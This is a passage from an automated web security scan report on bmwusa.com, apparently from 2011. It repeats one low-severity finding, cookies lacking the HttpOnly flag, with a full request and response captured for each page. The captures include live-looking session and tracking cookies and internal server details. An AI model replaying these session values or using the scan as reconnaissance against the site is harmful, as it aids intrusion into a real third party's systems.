Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:21 GMT;path=/
Content-Length: 212726


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.412. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:25 GMT;path=/
Content-Length: 226005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.413. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:58 GMT;path=/
Content-Length: 215485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.414. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:02:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:22:32 GMT;path=/
Content-Length: 202207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.415. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:56 GMT;path=/
Content-Length: 212730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.416. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:38 GMT;path=/
Content-Length: 226194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.417. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:04 GMT;path=/
Content-Length: 215296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.418. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:20 GMT;path=/
Content-Length: 202210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.419. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:57 GMT;path=/
Content-Length: 240756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.420. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4explore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:06:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:26:40 GMT;path=/
Content-Length: 180450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.421. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:14 GMT;path=/
Content-Length: 213969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.422. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Standard/Content/Vehicles/2011/Z4/Z4sDrive30i/features_and_specs/default.aspx?from=/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx&return=/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 401
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 22:08:14 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:14 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fStandard%2fContent%2fVehicles%2f2011%2fZ4%2fZ4sDrive30i%2ffeatures_and_specs%2fdefault.aspx%3ffrom%3d%2fstandard%2
...[SNIP]...

10.423. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:38 GMT;path=/
Content-Length: 215060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.424. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:57 GMT;path=/
Content-Length: 202214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.425. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

